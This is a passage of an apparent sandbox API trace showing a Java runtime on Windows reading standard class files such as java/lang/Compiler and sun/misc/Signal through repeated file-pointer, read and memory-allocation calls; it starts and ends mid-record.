returned="java/lang/Terminator.class" [0096.771] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172611, lpNewFilePointer=0x208e050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e050*=51848721) returned 1 [0096.771] ReadFile (in: hFile=0x134, lpBuffer=0x208e0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e020, lpOverlapped=0x0 | out: lpBuffer=0x208e0a0*, lpNumberOfBytesRead=0x208e020*=0x1e, lpOverlapped=0x0) returned 1 [0096.771] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172649, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=51848777) returned 1 [0096.771] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2cb, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e080*=0x2cb, lpOverlapped=0x0) returned 1 [0096.771] free (_Block=0x121daab0) [0096.772] free (_Block=0x121d9940) [0096.778] strlen (_Str="java/lang/Terminator$1.class") returned 0x1c [0096.778] malloc (_Size=0x48) returned 0x121d9670 [0096.778] malloc (_Size=0xa0) returned 0x121dc620 [0096.778] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b3a3, lpNewFilePointer=0x208e6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6a0*=54637475) returned 1 [0096.778] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e670, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e670*=0xa0, lpOverlapped=0x0) returned 1 [0096.778] malloc (_Size=0x1d) returned 0x121d7d30 [0096.778] free (_Block=0x121dc620) [0096.779] strlen (_Str="java/lang/Terminator$1.class") returned 0x1c [0096.779] strcpy (in: _Dest=0x208e820, _Source="java/lang/Terminator$1.class" | out: _Dest="java/lang/Terminator$1.class") returned="java/lang/Terminator$1.class" [0096.779] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172427, lpNewFilePointer=0x208e2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2a0*=51848231) returned 1 [0096.779] ReadFile (in: hFile=0x134, lpBuffer=0x208e2f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e270, lpOverlapped=0x0 | out: lpBuffer=0x208e2f0*, lpNumberOfBytesRead=0x208e270*=0x1e, lpOverlapped=0x0) returned 1 [0096.779] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3172461, lpNewFilePointer=0x208e300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e300*=51848289) returned 1 [0096.779] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1b0, lpNumberOfBytesRead=0x208e2d0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208e2d0*=0x1b0, lpOverlapped=0x0) returned 1 [0096.779] free (_Block=0x121d8180) [0096.779] free (_Block=0x121d96c0) [0096.781] strlen (_Str="sun/misc/SignalHandler.class") returned 0x1c [0096.781] malloc (_Size=0x48) returned 0x121d94e0 [0096.781] malloc (_Size=0xa0) returned 0x121dc620 [0096.781] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b359, lpNewFilePointer=0x208dbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbe0*=54637401) returned 1 [0096.781] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbb0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208dbb0*=0xa0, lpOverlapped=0x0) returned 1 [0096.781] malloc (_Size=0x1d) returned 0x121d8090 [0096.782] free (_Block=0x121dc620) [0096.782] strlen (_Str="sun/misc/SignalHandler.class") returned 0x1c [0096.782] strcpy (in: _Dest=0x208dd60, _Source="sun/misc/SignalHandler.class" | out: _Dest="sun/misc/SignalHandler.class") returned="sun/misc/SignalHandler.class" [0096.782] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31722a3, lpNewFilePointer=0x208d7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7e0*=51847843) returned 1 [0096.782] ReadFile (in: hFile=0x134, lpBuffer=0x208d830, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7b0, lpOverlapped=0x0 | out: lpBuffer=0x208d830*, lpNumberOfBytesRead=0x208d7b0*=0x1e, lpOverlapped=0x0) returned 1 [0096.782] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31722dd, lpNewFilePointer=0x208d840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d840*=51847901) returned 1 [0096.782] ReadFile (in: hFile=0x134, lpBuffer=0x2102b70, nNumberOfBytesToRead=0x14a, lpNumberOfBytesRead=0x208d810, lpOverlapped=0x0 | out: lpBuffer=0x2102b70*, lpNumberOfBytesRead=0x208d810*=0x14a, lpOverlapped=0x0) returned 1 [0096.782] free (_Block=0x121d7d30) [0096.783] free (_Block=0x121d9670) [0096.791] strlen (_Str="sun/misc/Signal.class") returned 0x15 [0096.791] malloc (_Size=0x48) returned 0x121d99e0 [0096.791] malloc (_Size=0xa0) returned 0x121dc620 [0096.791] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b316, lpNewFilePointer=0x208e6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6a0*=54637334) returned 1 [0096.791] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e670, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e670*=0xa0, lpOverlapped=0x0) returned 1 [0096.791] malloc (_Size=0x16) returned 0x1221b440 [0096.792] free (_Block=0x121dc620) [0096.792] strlen (_Str="sun/misc/Signal.class") returned 0x15 [0096.792] strcpy (in: _Dest=0x208e820, _Source="sun/misc/Signal.class" | out: _Dest="sun/misc/Signal.class") returned="sun/misc/Signal.class" [0096.792] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317177e, lpNewFilePointer=0x208e2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2a0*=51844990) returned 1 [0096.792] ReadFile (in: hFile=0x134, lpBuffer=0x208e2f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e270, lpOverlapped=0x0 | out: lpBuffer=0x208e2f0*, lpNumberOfBytesRead=0x208e270*=0x1e, lpOverlapped=0x0) returned 1 [0096.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31717b1, lpNewFilePointer=0x208e300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e300*=51845041) returned 1 [0096.833] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xaf2, lpNumberOfBytesRead=0x208e2d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e2d0*=0xaf2, lpOverlapped=0x0) returned 1 [0096.833] free (_Block=0x121d8090) [0096.834] free (_Block=0x121d94e0) [0096.844] strlen (_Str="sun/misc/NativeSignalHandler.class") returned 0x22 [0096.845] malloc (_Size=0x48) returned 0x121d9c60 [0096.845] malloc (_Size=0xa0) returned 0x121dc620 [0096.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b2c6, lpNewFilePointer=0x208e5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5f0*=54637254) returned 1 [0096.845] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e5c0*=0xa0, lpOverlapped=0x0) returned 1 [0096.845] malloc (_Size=0x23) returned 0x121d7d30 [0096.845] free (_Block=0x121dc620) [0096.846] strlen (_Str="sun/misc/NativeSignalHandler.class") returned 0x22 [0096.846] strcpy (in: _Dest=0x208e770, _Source="sun/misc/NativeSignalHandler.class" | out: _Dest="sun/misc/NativeSignalHandler.class") returned="sun/misc/NativeSignalHandler.class" [0096.846] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3171598, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=51844504) returned 1 [0096.846] ReadFile (in: hFile=0x134, lpBuffer=0x208e240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x208e240*, lpNumberOfBytesRead=0x208e1c0*=0x1e, lpOverlapped=0x0) returned 1 [0096.846] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31715d8, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=51844568) returned 1 [0096.846] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1a6, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208e220*=0x1a6, lpOverlapped=0x0) returned 1 [0096.846] free (_Block=0x1221b440) [0096.846] free (_Block=0x121d99e0) [0096.857] malloc (_Size=0x48) returned 0x121d9a80 [0096.857] malloc (_Size=0xa0) returned 0x121dc620 [0096.857] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b274, lpNewFilePointer=0x208e450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e450*=54637172) returned 1 [0096.857] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e420, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e420*=0xa0, lpOverlapped=0x0) returned 1 [0096.857] malloc (_Size=0x25) returned 0x121d8090 [0096.858] free (_Block=0x121dc620) [0096.858] strlen (_Str="java/lang/Integer$IntegerCache.class") returned 0x24 [0096.858] strcpy (in: _Dest=0x208e5d0, _Source="java/lang/Integer$IntegerCache.class" | out: _Dest="java/lang/Integer$IntegerCache.class") returned="java/lang/Integer$IntegerCache.class" [0096.858] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317115e, lpNewFilePointer=0x208e050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e050*=51843422) returned 1 [0096.858] ReadFile (in: hFile=0x134, lpBuffer=0x208e0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e020, lpOverlapped=0x0 | out: lpBuffer=0x208e0a0*, lpNumberOfBytesRead=0x208e020*=0x1e, lpOverlapped=0x0) returned 1 [0096.858] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31711a0, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=51843488) returned 1 [0096.858] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3f8, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e080*=0x3f8, lpOverlapped=0x0) returned 1 [0096.859] free (_Block=0x121d7d30) [0096.859] free (_Block=0x121d9c60) [0096.901] strlen (_Str="sun/misc/OSEnvironment.class") returned 0x1c [0096.901] malloc (_Size=0x48) returned 0x121d9a30 [0096.901] malloc (_Size=0xa0) returned 0x121dc620 [0096.901] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b22a, lpNewFilePointer=0x208e400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e400*=54637098) returned 1 [0096.901] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e3d0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e3d0*=0xa0, lpOverlapped=0x0) returned 1 [0096.902] malloc (_Size=0x1d) returned 0x121d7e20 [0096.902] free (_Block=0x121dc620) [0096.902] strlen (_Str="sun/misc/OSEnvironment.class") returned 0x1c [0096.902] strcpy (in: _Dest=0x208e580, _Source="sun/misc/OSEnvironment.class" | out: _Dest="sun/misc/OSEnvironment.class") returned="sun/misc/OSEnvironment.class" [0096.902] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x317104b, lpNewFilePointer=0x208e000, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e000*=51843147) returned 1 [0096.902] ReadFile (in: hFile=0x134, lpBuffer=0x208e050, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dfd0, lpOverlapped=0x0 | out: lpBuffer=0x208e050*, lpNumberOfBytesRead=0x208dfd0*=0x1e, lpOverlapped=0x0) returned 1 [0096.902] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3171085, lpNewFilePointer=0x208e060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e060*=51843205) returned 1 [0096.902] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x208e030, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208e030*=0xd9, lpOverlapped=0x0) returned 1 [0096.903] free (_Block=0x121d8090) [0096.903] free (_Block=0x121d9a80) [0096.907] strlen (_Str="sun/io/Win32ErrorMode.class") returned 0x1b [0096.907] malloc (_Size=0x48) returned 0x121d9990 [0096.907] malloc (_Size=0xa0) returned 0x121dc620 [0096.907] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b1e1, lpNewFilePointer=0x208e3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3b0*=54637025) returned 1 [0096.907] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e380, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e380*=0xa0, lpOverlapped=0x0) returned 1 [0096.908] malloc (_Size=0x1c) returned 0x121d7af0 [0096.908] free (_Block=0x121dc620) [0096.909] strlen (_Str="sun/io/Win32ErrorMode.class") returned 0x1b [0096.909] strcpy (in: _Dest=0x208e530, _Source="sun/io/Win32ErrorMode.class" | out: _Dest="sun/io/Win32ErrorMode.class") returned="sun/io/Win32ErrorMode.class" [0096.909] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3170cb7, lpNewFilePointer=0x208dfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfb0*=51842231) returned 1 [0096.909] ReadFile (in: hFile=0x134, lpBuffer=0x208e000, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df80, lpOverlapped=0x0 | out: lpBuffer=0x208e000*, lpNumberOfBytesRead=0x208df80*=0x1e, lpOverlapped=0x0) returned 1 [0096.979] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3170cf0, lpNewFilePointer=0x208e010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e010*=51842288) returned 1 [0096.979] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x35b, lpNumberOfBytesRead=0x208dfe0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dfe0*=0x35b, lpOverlapped=0x0) returned 1 [0096.979] free (_Block=0x121d7e20) [0096.979] free (_Block=0x121d9a30) [0096.985] SetErrorMode (uMode=0x0) returned 0x0 [0096.985] SetErrorMode (uMode=0x1) returned 0x0 [0096.986] strlen (_Str="java/lang/System$2.class") returned 0x18 [0096.986] malloc (_Size=0x48) returned 0x121d92b0 [0096.986] malloc (_Size=0xa0) returned 0x121dc620 [0096.987] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b19b, lpNewFilePointer=0x208e6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6b0*=54636955) returned 1 [0096.987] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e680, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e680*=0xa0, lpOverlapped=0x0) returned 1 [0096.987] malloc (_Size=0x19) returned 0x121d7d30 [0096.987] free (_Block=0x121dc620) [0096.987] strlen (_Str="java/lang/System$2.class") returned 0x18 [0096.987] strcpy (in: _Dest=0x208e830, _Source="java/lang/System$2.class" | out: _Dest="java/lang/System$2.class") returned="java/lang/System$2.class" [0096.987] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31700de, lpNewFilePointer=0x208e2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2b0*=51839198) returned 1 [0096.987] ReadFile (in: hFile=0x134, lpBuffer=0x208e300, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e280, lpOverlapped=0x0 | out: lpBuffer=0x208e300*, lpNumberOfBytesRead=0x208e280*=0x1e, lpOverlapped=0x0) returned 1 [0096.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3170114, lpNewFilePointer=0x208e310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e310*=51839252) returned 1 [0096.988] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xba3, lpNumberOfBytesRead=0x208e2e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e2e0*=0xba3, lpOverlapped=0x0) returned 1 [0096.988] free (_Block=0x121d7af0) [0096.988] free (_Block=0x121d9990) [0096.990] strlen (_Str="sun/misc/JavaLangAccess.class") returned 0x1d [0096.990] malloc (_Size=0x48) returned 0x121d96c0 [0096.990] malloc (_Size=0xa0) returned 0x121dc620 [0096.990] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b150, lpNewFilePointer=0x208dbf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbf0*=54636880) returned 1 [0096.990] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dbc0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208dbc0*=0xa0, lpOverlapped=0x0) returned 1 [0096.990] malloc (_Size=0x1e) returned 0x121d7d60 [0096.990] free (_Block=0x121dc620) [0096.991] strlen (_Str="sun/misc/JavaLangAccess.class") returned 0x1d [0096.991] strcpy (in: _Dest=0x208dd70, _Source="sun/misc/JavaLangAccess.class" | out: _Dest="sun/misc/JavaLangAccess.class") returned="sun/misc/JavaLangAccess.class" [0096.991] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316f9f7, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=51837431) returned 1 [0096.991] ReadFile (in: hFile=0x134, lpBuffer=0x208d840, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x208d840*, lpNumberOfBytesRead=0x208d7c0*=0x1e, lpOverlapped=0x0) returned 1 [0097.024] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316fa32, lpNewFilePointer=0x208d850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d850*=51837490) returned 1 [0097.025] ReadFile (in: hFile=0x134, lpBuffer=0x2103770, nNumberOfBytesToRead=0x6ac, lpNumberOfBytesRead=0x208d820, lpOverlapped=0x0 | out: lpBuffer=0x2103770*, lpNumberOfBytesRead=0x208d820*=0x6ac, lpOverlapped=0x0) returned 1 [0097.025] free (_Block=0x121d7d30) [0097.025] free (_Block=0x121d92b0) [0097.048] malloc (_Size=0x48) returned 0x121d9760 [0097.048] malloc (_Size=0xa0) returned 0x121dc620 [0097.048] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b0fa, lpNewFilePointer=0x208f340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f340*=54636794) returned 1 [0097.048] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f310, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208f310*=0xa0, lpOverlapped=0x0) returned 1 [0097.048] malloc (_Size=0x29) returned 0x121daab0 [0097.049] free (_Block=0x121dc620) [0097.049] strlen (_Str="java/lang/IllegalArgumentException.class") returned 0x28 [0097.049] strcpy (in: _Dest=0x208f4c0, _Source="java/lang/IllegalArgumentException.class" | out: _Dest="java/lang/IllegalArgumentException.class") returned="java/lang/IllegalArgumentException.class" [0097.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316f7f3, lpNewFilePointer=0x208ef40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef40*=51836915) returned 1 [0097.049] ReadFile (in: hFile=0x134, lpBuffer=0x208ef90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ef10, lpOverlapped=0x0 | out: lpBuffer=0x208ef90*, lpNumberOfBytesRead=0x208ef10*=0x1e, lpOverlapped=0x0) returned 1 [0097.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316f839, lpNewFilePointer=0x208efa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208efa0*=51836985) returned 1 [0097.050] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1be, lpNumberOfBytesRead=0x208ef70, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208ef70*=0x1be, lpOverlapped=0x0) returned 1 [0097.050] free (_Block=0x121d7d60) [0097.050] free (_Block=0x121d96c0) [0097.056] strlen (_Str="java/lang/Compiler.class") returned 0x18 [0097.056] malloc (_Size=0x48) returned 0x121d9850 [0097.057] malloc (_Size=0xa0) returned 0x121dc620 [0097.057] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b0b4, lpNewFilePointer=0x208f340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f340*=54636724) returned 1 [0097.057] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f310, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208f310*=0xa0, lpOverlapped=0x0) returned 1 [0097.057] malloc (_Size=0x19) returned 0x121d7e50 [0097.057] free (_Block=0x121dc620) [0097.057] strlen (_Str="java/lang/Compiler.class") returned 0x18 [0097.058] strcpy (in: _Dest=0x208f4c0, _Source="java/lang/Compiler.class" | out: _Dest="java/lang/Compiler.class") returned="java/lang/Compiler.class" [0097.058] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316f4f9, lpNewFilePointer=0x208ef40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ef40*=51836153) returned 1 [0097.058] ReadFile (in: hFile=0x134, lpBuffer=0x208ef90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ef10, lpOverlapped=0x0 | out: lpBuffer=0x208ef90*, lpNumberOfBytesRead=0x208ef10*=0x1e, lpOverlapped=0x0) returned 1 [0097.058] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316f52f, lpNewFilePointer=0x208efa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208efa0*=51836207) returned 1 [0097.058] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2c4, lpNumberOfBytesRead=0x208ef70, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ef70*=0x2c4, lpOverlapped=0x0) returned 1 [0097.058] free (_Block=0x121daab0) [0097.059] free (_Block=0x121d9760) [0097.067] strlen (_Str="java/lang/Compiler$1.class") returned 0x1a [0097.068] malloc (_Size=0x48) returned 0x121d8fe0 [0097.068] malloc (_Size=0xa0) returned 0x121dc620 [0097.068] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b06c, lpNewFilePointer=0x208e5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5f0*=54636652) returned 1 [0097.069] ReadFile (in: hFile=0x134, lpBuffer=0x121dc620, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5c0, lpOverlapped=0x0 | out: lpBuffer=0x121dc620*, lpNumberOfBytesRead=0x208e5c0*=0xa0, lpOverlapped=0x0) returned 1 [0097.069] malloc (_Size=0x1b) returned 0x121d7d30 [0097.069] free (_Block=0x121dc620) [0097.070] strlen (_Str="java/lang/Compiler$1.class") returned 0x1a [0097.070] strcpy (in: _Dest=0x208e770, _Source="java/lang/Compiler$1.class" | out: _Dest="java/lang/Compiler$1.class") returned="java/lang/Compiler$1.class" [0097.070] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316ef5f, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=51834719) returned 1 [0097.070] ReadFile (in: hFile=0x134, lpBuffer=0x208e240, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x208e240*, lpNumberOfBytesRead=0x208e1c0*=0x1e, lpOverlapped=0x0) returned 1 [0097.071] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316ef97, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=51834775) returned 1 [0097.071] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x562, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e220*=0x562, lpOverlapped=0x0) returned 1 [0097.071] free (_Block=0x121d7e50) [0097.072] free (_Block=0x121d9850) [0097.086] strlen (_Str="sun/misc/Launcher$Factory.class") returned 0x1f [0097.087] malloc (_Size=0x48) returned 0x121d9990 [0097.087] malloc (_Size=0xa0) returned 0x1221be60 [0097.087] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341b01f, lpNewFilePointer=0x208dd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd20*=54636575) returned 1 [0097.087] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcf0, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208dcf0*=0xa0, lpOverlapped=0x0) returned 1 [0097.088] malloc (_Size=0x20) returned 0x121d8180 [0097.088] free (_Block=0x1221be60) [0097.089] strlen (_Str="sun/misc/Launcher$Factory.class") returned 0x1f [0097.089] strcpy (in: _Dest=0x208dea0, _Source="sun/misc/Launcher$Factory.class" | out: _Dest="sun/misc/Launcher$Factory.class") returned="sun/misc/Launcher$Factory.class" [0097.089] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316ea66, lpNewFilePointer=0x208d920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d920*=51833446) returned 1 [0097.089] ReadFile (in: hFile=0x134, lpBuffer=0x208d970, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8f0, lpOverlapped=0x0 | out: lpBuffer=0x208d970*, lpNumberOfBytesRead=0x208d8f0*=0x1e, lpOverlapped=0x0) returned 1 [0097.089] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316eaa3, lpNewFilePointer=0x208d980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d980*=51833507) returned 1 [0097.089] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x4bc, lpNumberOfBytesRead=0x208d950, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d950*=0x4bc, lpOverlapped=0x0) returned 1 [0097.089] free (_Block=0x121d7d30) [0097.090] free (_Block=0x121d8fe0) [0097.091] strlen (_Str="java/net/URLStreamHandlerFactory.class") returned 0x26 [0097.091] malloc (_Size=0x48) returned 0x121d8fe0 [0097.091] malloc (_Size=0xa0) returned 0x1221be60 [0097.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341afcb, lpNewFilePointer=0x208d260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d260*=54636491) returned 1 [0097.092] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d230, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208d230*=0xa0, lpOverlapped=0x0) returned 1 [0097.092] malloc (_Size=0x27) returned 0x121d7d30 [0097.092] free (_Block=0x1221be60) [0097.092] strlen (_Str="java/net/URLStreamHandlerFactory.class") returned 0x26 [0097.092] strcpy (in: _Dest=0x208d3e0, _Source="java/net/URLStreamHandlerFactory.class" | out: _Dest="java/net/URLStreamHandlerFactory.class") returned="java/net/URLStreamHandlerFactory.class" [0097.092] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316e97b, lpNewFilePointer=0x208ce60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce60*=51833211) returned 1 [0097.092] ReadFile (in: hFile=0x134, lpBuffer=0x208ceb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce30, lpOverlapped=0x0 | out: lpBuffer=0x208ceb0*, lpNumberOfBytesRead=0x208ce30*=0x1e, lpOverlapped=0x0) returned 1 [0097.092] SetFilePointerEx (in: hFile=0x134, 